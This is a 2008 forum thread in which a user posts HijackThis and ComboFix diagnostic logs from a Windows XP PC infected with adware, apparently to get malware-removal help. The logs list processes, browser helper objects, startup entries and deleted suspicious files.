Posted: 02 Jun 2008 21:02
- dule444
- New MyCity citizen
- Joined: 19 May 2008
- Posts: 5
- Location: beograd
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 20:44:21, on 2.6.2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Eset\nod32krn.exe
C:\WINDOWS\system32\UAService7.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Analog Devices\SoundMAX\SMax4PNP.exe
C:\Program Files\Analog Devices\SoundMAX\smax4.exe
C:\Program Files\Eset\nod32kui.exe
C:\WINDOWS\system32\WgaTray.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe
C:\WINDOWS\AGRSMMSG.exe
C:\Program Files\Winamp\winampa.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Windows Live\Messenger\MsnMsgr.Exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Common Files\Ahead\Lib\NMIndexStoreSvr.exe
C:\Program Files\VIA Technologies, Inc\VIA Audio Driver Setup Program\AudioDeck\AudioDeck.exe
C:\Program Files\Prolink\PixelView PlayTV Pro 5.25\TVRMVCR.EXE
C:\Program Files\Prolink\PixelView PlayTV Pro 5.25\TVSCHL.EXE
C:\Program Files\LimeWire\LimeWire.exe
C:\PROGRA~1\Yahoo!\MESSEN~1\ymsgr_tray.exe
C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\Windows Live\Messenger\usnsvc.exe
C:\Program Files\Opera\Opera.exe
C:\Program Files\Real\RealPlayer\RealPlay.exe
C:\WINDOWS\system32\wscntfy.exe
C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
C:\PROGRA~1\AVG\AVG8\avgrsx.exe
C:\Program Files\AVG\AVG8\avgfrw.exe
C:\Program Files\AVG\AVG8\avgtray.exe
C:\PROGRA~1\AVG\AVG8\avgupd.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = search.bearshare.com/sidebar.html?src=ssb
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = search.bearshare.com/intl/
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = home.sweetim.com
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = 127.0.0.1
R3 - URLSearchHook: (no name) - {9CB65206-89C4-402c-BA80-02D8C59F9B1D} - C:\Program Files\AskTBar\SrchAstt\1.bin\A5SRCHAS.DLL (file missing)
R3 - URLSearchHook: (no name) - {00A6FAF6-072E-44cf-8957-5838F569A31D} - C:\Program Files\MyWebSearch\SrchAstt\1.bin\MWSSRCAS.DLL (file missing)
R3 - URLSearchHook: Yahoo! ¤u¨a¦C - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\PROGRA~1\Yahoo!\Companion\Installs\cpn\yt.dll
O2 - BHO: MyWebSearch Search Assistant BHO - {00A6FAF1-072E-44cf-8957-5838F569A31D} - C:\Program Files\MyWebSearch\SrchAstt\1.bin\MWSSRCAS.DLL (file missing)
O2 - BHO: &Yahoo! Toolbar Helper - {02478D38-C3F9-4efb-9B51-7695ECA05670} - C:\PROGRA~1\Yahoo!\Companion\Installs\cpn\yt.dll
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: mwsBar BHO - {07B18EA1-A523-4961-B6BB-170DE4475CCA} - C:\Program Files\MyWebSearch\bar\1.bin\MWSBAR.DLL (file missing)
O2 - BHO: (no name) - {23D44BCF-AA7A-41D6-8905-E808F16322EF} - C:\WINDOWS\system32\gebbxvw.dll (file missing)
O2 - BHO: cpmsky browser optimizer - {277a0c59-78e6-99de-6946-a2a71f55165a} - C:\WINDOWS\system32\{f1a028d3-d7ee-ffee-cf92-6d391d4a8f45}.dll
O2 - BHO: {ed108e55-6531-0438-6864-6d2ea2229663} - {3669222a-e2d6-4686-8340-135655e801de} - C:\WINDOWS\system32\xhvgmvfa.dll (file missing)
O2 - BHO: adzgalore - {386c1b5e-df71-2d31-08e7-83354bf04e50} - C:\WINDOWS\system32\nskD4.dll
O2 - BHO: WormRadar.com IESiteBlocker.NavFilter - {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} - C:\Program Files\AVG\AVG8\avgssie.dll
O2 - BHO: (no name) - {517854CF-7B97-4204-BC88-13768F2CCF61} - C:\WINDOWS\system32\ssttu.dll
O2 - BHO: Yahoo! IE Services Button - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O2 - BHO: UrlHelper Class - {74322BF9-DF26-493f-B0DA-6D2FC5E6429E} - C:\Program Files\BearShare Applications\BearShare MediaBar\BearShareIEHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: Windows Live pomagac za prijavljivanje - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Ask Search Assistant BHO - {9CB65201-89C4-402c-BA80-02D8C59F9B1D} - C:\Program Files\AskTBar\SrchAstt\1.bin\A5SRCHAS.DLL (file missing)
O2 - BHO: AVG Security Toolbar - {A057A204-BACC-4D26-9990-79A187E2698E} - C:\PROGRA~1\AVG\AVG8\AVGTOO~1.DLL
O2 - BHO: mysidesearch browser optimizer - {bec35b16-b03b-b4e6-8917-3250adcd93bc} - C:\WINDOWS\system32\{69069469-9671-3856-b652-e88468082b08}.dll
O2 - BHO: Ask Toolbar BHO - {FE063DB1-4EC0-403e-8DD8-394C54984B2C} - C:\Program Files\AskTBar\bar\2.bin\ASKTBAR.DLL (file missing)
O3 - Toolbar: Ask Toolbar - {FE063DB9-4EC0-403e-8DD8-394C54984B2C} - C:\Program Files\AskTBar\bar\2.bin\ASKTBAR.DLL (file missing)
O3 - Toolbar: My Web Search - {07B18EA9-A523-4961-B6BB-170DE4475CCA} - C:\Program Files\MyWebSearch\bar\1.bin\MWSBAR.DLL (file missing)
O3 - Toolbar: Yahoo! ¤u¨a¦C - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\PROGRA~1\Yahoo!\Companion\Installs\cpn\yt.dll
O3 - Toolbar: BearShare MediaBar - {D3DEE18F-DB64-4BEB-9FF1-E1F0A5033E4A} - C:\Program Files\BearShare Applications\BearShare MediaBar\BearShareMediaBar.dll
O3 - Toolbar: AVG Security Toolbar - {A057A204-BACC-4D26-9990-79A187E2698E} - C:\PROGRA~1\AVG\AVG8\AVGTOO~1.DLL
O4 - HKLM\..\Run: [SoundMAXPnP] C:\Program Files\Analog Devices\SoundMAX\SMax4PNP.exe
O4 - HKLM\..\Run: [SoundMAX] "C:\Program Files\Analog Devices\SoundMAX\smax4.exe" /tray
O4 - HKLM\..\Run: [NeroFilterCheck] C:\Program Files\Common Files\Ahead\Lib\NeroCheck.exe
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe"
O4 - HKLM\..\Run: [AGRSMMSG] AGRSMMSG.exe
O4 - HKLM\..\Run: [WinampAgent] "C:\Program Files\Winamp\winampa.exe"
O4 - HKLM\..\Run: [bend logo clock film] C:\Documents and Settings\All Users\Application Data\Frag great bend logo\Rect blah.exe
O4 - HKLM\..\Run: [{e0b2bd96-0d3c-b2e0-b9b8-fdc3e3b7792d}] C:\WINDOWS\System32\Rundll32.exe "C:\WINDOWS\system32\{f1a028d3-d7ee-ffee-cf92-6d391d4a8f45}.dll" DllInit
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [AVG8_TRAY] C:\PROGRA~1\AVG\AVG8\avgtray.exe
O4 - HKCU\..\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe"
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\Windows Live\Messenger\MsnMsgr.Exe" /background
O4 - HKCU\..\Run: [RealInter] C:\DOCUME~1\NETWOR~1\APPLIC~1\MOVESI~1\Bat flag close.exe
O4 - HKCU\..\Run: [Yahoo! Pager] "C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.EXE" -quiet
O4 - Startup: LimeWire On Startup.lnk = C:\Program Files\LimeWire\LimeWire.exe
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe
O4 - Global Startup: Adobe Reader Synchronizer.lnk = C:\Program Files\Adobe\Reader 8.0\Reader\AdobeCollabSync.exe
O4 - Global Startup: AudioDeck.lnk = C:\Program Files\VIA Technologies, Inc\VIA Audio Driver Setup Program\AudioDeck\AudioDeck.exe
O4 - Global Startup: Remote Controller.lnk = C:\Program Files\Prolink\PixelView PlayTV Pro 5.25\TVRMVCR.EXE
O4 - Global Startup: Scheduler.lnk = C:\Program Files\Prolink\PixelView PlayTV Pro 5.25\TVSCHL.EXE
O8 - Extra context menu item: &Search - edits.mywebsearch.com/toolbaredits/menusearch.jhtml?p=ZN
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
O9 - Extra button: Yahoo! Services - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (Installation Support) - C:\Program Files\Yahoo!\Common\Yinsthelper.dll
O18 - Protocol: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG8\avgpp.dll
O20 - AppInit_DLLs: avgrsstx.dll
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\system32\ati2sgag.exe
O23 - Service: AVG8 WatchDog (avg8wd) - AVG Technologies CZ, s.r.o. - C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe
O23 - Service: NBService - Nero AG - C:\Program Files\Nero\Nero 7\Nero BackItUp\NBService.exe
O23 - Service: NMIndexingService - Nero AG - C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe
O23 - Service: SecuROM User Access Service (V7) (UserAccess7) - Unknown owner - C:\WINDOWS\system32\UAService7.exe
--
End of file - 9792 bytes
Posted: 02 Jun 2008 21:56
- dule444
ComboFix 08-06-01.6 - n 2008-06-02 21:38:59.2 - NTFSx86
Microsoft Windows XP Professional 5.1.2600.2.1252.1.1033.18.96 [GMT 2:00]
Running from: C:\Documents and Settings\n\My Documents\ComboFix.exe
WARNING -THIS MACHINE DOES NOT HAVE THE RECOVERY CONSOLE INSTALLED !!
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
C:\Documents and Settings\n\Start Menu\Programs\Adzgalore Games Collection
C:\Documents and Settings\n\Start Menu\Programs\Adzgalore Games Collection\Bob and Bill adventures - Wild Hunting.lnk
C:\Documents and Settings\n\Start Menu\Programs\Adzgalore Games Collection\Crazy Blocks.lnk
C:\Documents and Settings\n\Start Menu\Programs\Adzgalore Games Collection\Lines.lnk
C:\Documents and Settings\n\Start Menu\Programs\Adzgalore Games Collection\The Battles Of Helicopters.lnk
C:\Documents and Settings\n\Start Menu\Programs\Adzgalore Games Collection\Video Pool.lnk
C:\WINDOWS\17PHolmes2000201.exe
C:\WINDOWS\system32\{f1a028d3-d7ee-ffee-cf92-6d391d4a8f45}.dll
C:\WINDOWS\system32\arlfnpmy.ini
C:\WINDOWS\system32\bslxdnsl.ini
C:\WINDOWS\system32\exworkdw.ini
C:\WINDOWS\system32\hjechnje.ini
C:\WINDOWS\system32\hqmjjueu.ini
C:\WINDOWS\system32\iadlmobi.dll
C:\WINDOWS\system32\kxghksxx.ini
C:\WINDOWS\system32\lsndxlsb.dll
C:\WINDOWS\system32\nainpaun.ini
C:\WINDOWS\system32\nskD4.dll
C:\WINDOWS\system32\sdjwdqvw.ini
C:\WINDOWS\system32\sqlgnaju.ini
C:\WINDOWS\system32\ssttu.dll
C:\WINDOWS\system32\suubjcjh.dll
C:\WINDOWS\system32\tounsikg.ini
C:\WINDOWS\system32\uttss.ini
C:\WINDOWS\system32\uttss.ini2
C:\WINDOWS\system32\ympnflra.dll
.
---- Previous Run -------
.
C:\Program Files\Adzgalore Games Collection
C:\Program Files\Adzgalore Games Collection\BattlesOfHelicopters.exe
C:\Program Files\Adzgalore Games Collection\BobAndBill.exe
C:\Program Files\Adzgalore Games Collection\CrazyBlocks.exe
C:\Program Files\Adzgalore Games Collection\Lines.exe
C:\Program Files\Adzgalore Games Collection\uninstall.exe
C:\Program Files\Adzgalore Games Collection\VideoPool.exe
C:\WINDOWS\cookies.ini
C:\WINDOWS\system32\adzgalore-remove.exe
.
((((((((((((((((((((((((( Files Created from 2008-05-02 to 2008-06-02 )))))))))))))))))))))))))))))))
.
2008-06-02 21:32 . 2008-06-02 21:32 2,280 --a------ C:\WINDOWS\TSCTNDBG.INI
2008-06-02 20:28 . 2008-06-02 20:28 10,520 --a------ C:\WINDOWS\system32\avgrsstx.dll
2008-06-02 20:27 . 2008-06-02 20:39 <DIR> d-------- C:\WINDOWS\system32\drivers\Avg
2008-06-02 20:27 . 2008-06-02 20:27 <DIR> d-------- C:\Program Files\AVG
2008-06-02 20:27 . 2008-06-02 21:34 <DIR> d-------- C:\Documents and Settings\n\Application Data\AVGTOOLBAR
2008-06-02 20:27 . 2008-06-02 21:32 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\avg8
2008-06-02 20:27 . 2008-06-02 20:27 96,520 --a------ C:\WINDOWS\system32\drivers\avgldx86.sys
2008-06-01 20:41 . 2008-06-01 20:41 <DIR> d-------- C:\Documents and Settings\NetworkService\Application Data\move sixth tool
2008-06-01 20:40 . 2008-06-01 20:40 <DIR> d-------- C:\Documents and Settings\NetworkService\Application Data\Xfire
2008-06-01 20:36 . 2008-06-01 20:40 <DIR> d-------- C:\Documents and Settings\n\Application Data\Xfire
2008-06-01 20:35 . 2008-06-01 20:41 <DIR> d-------- C:\Program Files\Xfire
2008-06-01 20:28 . 2008-06-01 20:30 <DIR> d-------- C:\Program Files\QuickTime
2008-06-01 20:28 . 2008-06-01 20:28 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\Apple Computer
2008-05-27 21:12 . 2008-05-27 21:12 <DIR> d-------- C:\Program Files\Trend Micro
2008-05-26 21:48 . 2008-05-26 21:48 <DIR> d-------- C:\Program Files\Ashiyane Digital Security Team
2008-05-26 21:48 . 2008-05-26 21:48 <DIR> d-------- C:\MSN Emoticons
2008-05-26 21:48 . 2008-05-26 21:48 <DIR> d-------- C:\MSN Display Pics
2008-05-26 21:48 . 2008-05-26 21:48 <DIR> d-------- C:\Documents and Settings\n\Application Data\Notepad++
2008-05-24 14:21 . 2008-05-24 14:21 75 --a------ C:\WINDOWS\METROMON.INI
2008-05-24 13:19 . 2008-05-26 21:47 <DIR> d-------- C:\Program Files\AtomixMP3
2008-05-23 20:49 . 2008-05-26 21:47 <DIR> d-------- C:\Documents and Settings\n\Application Data\BearShare
2008-05-23 20:48 . 2006-11-12 11:39 483,328 --a------ C:\WINDOWS\system32\actskn45.ocx
2008-05-23 20:47 . 2008-05-23 20:52 <DIR> d-------- C:\Program Files\BearShare Applications
2008-05-17 21:07 . 2008-05-17 21:07 95,865 --a------ C:\WINDOWS\system32\{69069469-9671-3856-b652-e88468082b08}.dll-uninst.exe
2008-05-17 21:03 . 2008-05-17 21:03 63,916 --a------ C:\WINDOWS\system32\{f1a028d3-d7ee-ffee-cf92-6d391d4a8f45}.dll-uninst.exe
2008-05-16 16:12 . 2008-05-16 16:12 440,832 --a------ C:\WINDOWS\system32\{69069469-9671-3856-b652-e88468082b08}.dll
2008-05-14 03:28 . 2008-05-14 03:28 41,296 --a------ C:\WINDOWS\system32\xfcodec.dll
2008-05-13 18:40 . 2008-05-13 18:40 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\Yahoo! Companion
2008-05-12 21:37 . 2008-05-18 20:57 <DIR> d-------- C:\Documents and Settings\n\Application Data\CenoPDF
2008-05-12 21:31 . 2008-06-02 21:33 <DIR> d-------- C:\Documents and Settings\n\Application Data\LimeWire
2008-05-12 21:28 . 2008-05-24 13:23 <DIR> d-------- C:\Program Files\LimeWire
2008-05-08 20:37 . 2008-05-08 20:19 691,545 --a------ C:\WINDOWS\unins000.exe
2008-05-08 20:37 . 2008-05-08 20:37 2,546 --a------ C:\WINDOWS\unins000.dat
2008-05-08 17:51 . 2008-05-08 17:51 <DIR> d--hsc--- C:\Program Files\Common Files\WindowsLiveInstaller
2008-05-08 17:50 . 2008-05-08 17:50 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\WLInstaller
2008-05-08 16:18 . 2008-05-12 21:16 <DIR> d-------- C:\Program Files\Spybot - Search & Destroy
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2008-06-02 19:27 --------- d-----w C:\Program Files\ESET
2008-05-27 19:26 --------- d-----w C:\Program Files\MSN Messenger
2008-05-27 19:25 --------- d-----w C:\Program Files\Messenger Plus! Live
2008-05-27 18:35 --------- d-----w C:\Program Files\Common Files\Adobe
2008-05-26 19:48 --------- d-----w C:\Program Files\Macrogaming
2008-05-26 19:47 --------- d-----w C:\Program Files\Free Download Manager
2008-05-26 19:47 --------- d-----w C:\Program Files\Championship Manager 5
2008-05-26 19:46 --------- d-----w C:\Program Files\Offline Explorer Enterprise
2008-05-24 11:23 81,920 ----a-w C:\Documents and Settings\n\Application Data\ezpinst.exe
2008-05-24 11:23 47,360 ----a-w C:\Documents and Settings\n\Application Data\pcouffin.sys
2008-05-24 11:23 --------- d-----w C:\Documents and Settings\n\Application Data\Vso
2008-05-24 09:38 --------- d-----w C:\Program Files\Yahoo!
2008-05-16 18:36 --------- d--h--w C:\Program Files\InstallShield Installation Information
2008-05-12 17:04 --------- d-----w C:\Documents and Settings\n\Application Data\uTorrent
2008-05-12 16:13 --------- d-----w C:\Documents and Settings\All Users\Application Data\Yahoo!
2008-05-08 19:22 --------- d-----w C:\Documents and Settings\All Users\Application Data\Spybot - Search & Destroy
2008-05-08 15:50 --------- d-----w C:\Program Files\Windows Live
2008-04-28 20:03 --------- d-----w C:\Documents and Settings\n\Application Data\move sixth tool
2008-04-28 20:03 --------- d-----w C:\Documents and Settings\All Users\Application Data\Messenger Plus!
2008-04-28 20:02 --------- d-----w C:\Program Files\move sixth tool
2008-04-28 20:02 --------- d-----w C:\Documents and Settings\All Users\Application Data\Frag great bend logo
2008-04-28 20:01 --------- d-----w C:\Program Files\Circle Developement
2008-04-28 16:59 --------- d-----w C:\Program Files\Lystech Computing
2008-04-21 17:34 744 ----a-w C:\mail.vbs
2008-04-18 19:19 --------- d-----w C:\Program Files\Common Files\Wise Installation Wizard
2008-04-18 19:14 --------- d-----w C:\Program Files\X-Fusions Wallpaper
2008-04-10 13:08 --------- d-----w C:\Documents and Settings\n\Application Data\Yahoo!
2008-04-10 12:37 --------- d-----w C:\Program Files\MauZ Php Editor
2008-04-09 15:01 --------- d-----w C:\Documents and Settings\n\Application Data\TeamViewer
2008-04-07 15:45 --------- d-----w C:\Program Files\Apple Software Update
2008-04-07 15:44 --------- d-----w C:\Documents and Settings\All Users\Application Data\Apple
2008-04-04 19:17 --------- d-----w C:\Program Files\Vista Start Menu
2008-04-04 18:50 64,650 ----a-w C:\WINDOWS\BricoPackUninst.cmd
2008-04-04 18:50 6,106 ----a-w C:\WINDOWS\BricoPackFoldersDelete.cmd
2008-04-04 10:18 720,896 ----a-w C:\WINDOWS\iun6002.exe
2008-04-02 18:06 --------- d-----w C:\Program Files\Zone Labs
2008-04-02 10:02 --------- d-----w C:\Program Files\Java
2007-11-05 12:00 524,300 ----a-w C:\Documents and Settings\n\Application Data\position.bin
2002-01-13 03:28 1,164,456 ----a-w C:\Program Files\install_flash_player.exe
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{3669222a-e2d6-4686-8340-135655e801de}]
C:\WINDOWS\system32\xhvgmvfa.dll
[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{74322BF9-DF26-493f-B0DA-6D2FC5E6429E}]
2007-10-11 15:45 402872 --a------ C:\Program Files\BearShare Applications\BearShare MediaBar\BearShareIEHelper.dll
[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{A057A204-BACC-4D26-9990-79A187E2698E}]
2008-06-02 20:27 2050816 --a------ C:\PROGRA~1\AVG\AVG8\AVGTOO~1.DLL
[HKEY_LOCAL_MACHINE\~\Browser Helper Objects\{bec35b16-b03b-b4e6-8917-3250adcd93bc}]
2008-05-16 16:12 440832 --a------ C:\WINDOWS\system32\{69069469-9671-3856-b652-e88468082b08}.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
"{A057A204-BACC-4D26-9990-79A187E2698E}"= "C:\PROGRA~1\AVG\AVG8\AVGTOO~1.DLL" [2008-06-02 20:27 2050816]
[HKEY_CLASSES_ROOT\clsid\{a057a204-bacc-4d26-9990-79a187e2698e}]
[HKEY_CLASSES_ROOT\avgtoolbar.AVGTOOLBAR]
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser]
"{A057A204-BACC-4D26-9990-79A187E2698E}"= C:\PROGRA~1\AVG\AVG8\AVGTOO~1.DLL [2008-06-02 20:27 2050816]
[HKEY_CLASSES_ROOT\clsid\{a057a204-bacc-4d26-9990-79a187e2698e}]
[HKEY_CLASSES_ROOT\avgtoolbar.AVGTOOLBAR]
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}"="C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe" [2007-01-15 17:14 147456]
"ctfmon.exe"="C:\WINDOWS\system32\ctfmon.exe" [2004-08-04 03:07 15360]
"MsnMsgr"="C:\Program Files\Windows Live\Messenger\MsnMsgr.exe" [2007-10-18 11:35 5724184]
"RealInter"="C:\DOCUME~1\NETWOR~1\APPLIC~1\MOVESI~1\Bat flag close.exe" [2008-04-28 22:02 479232]
"Yahoo! Pager"="C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.exe" [2007-08-30 17:43 4670704]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SoundMAXPnP"="C:\Program Files\Analog Devices\SoundMAX\SMax4PNP.exe" [2004-10-14 10:11 1388544]
"NeroFilterCheck"="C:\Program Files\Common Files\Ahead\Lib\NeroCheck.exe" [2006-01-12 16:40 155648]
"TkBellExe"="C:\Program Files\Common Files\Real\Update_OB\realsched.exe" [2002-01-07 11:13 180269]
"SunJavaUpdateSched"="C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe" [2008-02-22 04:25 144784]
"AGRSMMSG"="AGRSMMSG.exe" [2004-06-29 10:06 88363 C:\WINDOWS\AGRSMMSG.exe]
"WinampAgent"="C:\Program Files\Winamp\winampa.exe" [2007-10-10 07:28 36352]
"bend logo clock film"="C:\Documents and Settings\All Users\Application Data\Frag great bend logo\Rect blah.exe" [2008-06-02 21:49 549888]
"QuickTime Task"="C:\Program Files\QuickTime\QTTask.exe" [2008-01-31 23:13 385024]
"AVG8_TRAY"="C:\PROGRA~1\AVG\AVG8\avgtray.exe" [2008-06-02 20:27 1177368]
C:\Documents and Settings\n\Start Menu\Programs\Startup\
LimeWire On Startup.lnk - C:\Program Files\LimeWire\LimeWire.exe [2008-04-18 21:21:09 147456]
C:\Documents and Settings\All Users\Start Menu\Programs\Startup\
Adobe Reader Speed Launch.lnk - C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe [2006-10-23 02:48:20 40048]
Adobe Reader Synchronizer.lnk - C:\Program Files\Adobe\Reader 8.0\Reader\AdobeCollabSync.exe [2006-10-23 01:01:50 734872]
AudioDeck.lnk - C:\Program Files\VIA Technologies, Inc\VIA Audio Driver Setup Program\AudioDeck\AudioDeck.exe [2002-03-18 11:13:06 581632]
Remote Controller.lnk - C:\Program Files\Prolink\PixelView PlayTV Pro 5.25\TVRMVCR.EXE [2002-03-18 11:37:43 102400]
Scheduler.lnk - C:\Program Files\Prolink\PixelView PlayTV Pro 5.25\TVSCHL.EXE [2002-03-18 11:37:43 118784]
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\windows]
"AppInit_DLLs"=avgrsstx.dll
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"VIDC.AP41"= APmpg4v1.dll
"vidc.DIV3"= DivXc32.dll
"msacm.divxa32"= DivXa32.acm
"vidc.DIV4"= DivXc32f.dll
"VIDC.ACDV"= ACDV.dll
"VIDC.XFR1"= xfcodec.dll
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\PowerS]
--a------ 2001-08-03 18:56 159800 C:\WINDOWS\PowerS.exe
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RaidTool]
--------- 2004-10-11 08:54 589824 C:\Program Files\VIA\RAID\raid_tool.exe
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Yahoo! Pager]
--a------ 2007-08-30 17:43 4670704 C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\services]
"WZCSVC"=2 (0x2)
"SSDPSRV"=3 (0x3)
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"C:\\Program Files\\Messenger\\msmsgs.exe"=
"C:\\Program Files\\eMule\\emule.exe"=
"C:\\Program Files\\Yahoo!\\Messenger\\YahooMessenger.exe"=
"C:\\Program Files\\Yahoo!\\Messenger\\YServer.exe"=
"C:\\Program Files\\LimeWire\\LimeWire.exe"=
"C:\\Program Files\\Evil Msn\\Evil Msn 3.0.exe"=
"C:\\Program Files\\BearShare Applications\\BearShare\\BearShare.exe"=
"C:\\Program Files\\Windows Live\\Messenger\\msnmsgr.exe"=
"C:\\Program Files\\Windows Live\\Messenger\\livecall.exe"=
"C:\\Program Files\\Xfire\\xfire.exe"=
"C:\\Program Files\\AVG\\AVG8\\avgupd.exe"=
R0 videX32;videX32;C:\WINDOWS\system32\DRIVERS\videX32.sys [2006-02-23 12:38]
R1 AvgLdx86;AVG AVI Loader Driver x86;C:\WINDOWS\system32\Drivers\avgldx86.sys [2008-06-02 20:27]
R2 avg8wd;AVG8 WatchDog;C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe [2008-06-02 20:27]
R2 BT878;BtCap, WDM Video Capture;C:\WINDOWS\system32\drivers\BT878.SYS [2004-04-07 22:30]
R2 BTTUNER;BtTuner, WDM TV Tuner;C:\WINDOWS\system32\drivers\BTTUNER.SYS [2004-04-07 22:30]
R2 BTXBAR;BtXBar, WDM Crossbar;C:\WINDOWS\system32\drivers\BTXBAR.SYS [2004-04-07 22:30]
S3 CV2K1;CommView Network Monitor;C:\WINDOWS\system32\DRIVERS\cv2k1.sys []
S3 usnjsvc;Usluga Messenger Sharing Folders USN Journal Reader;"C:\Program Files\Windows Live\Messenger\usnsvc.exe" [2007-10-18 11:31]
S3 Vsp;Vsp;C:\WINDOWS\system32\drivers\Vsp.sys [2003-05-27 17:45]
.
Contents of the 'Scheduled Tasks' folder
"2008-06-02 19:00:31 C:\WINDOWS\Tasks\A4277F9291B0F052.job"
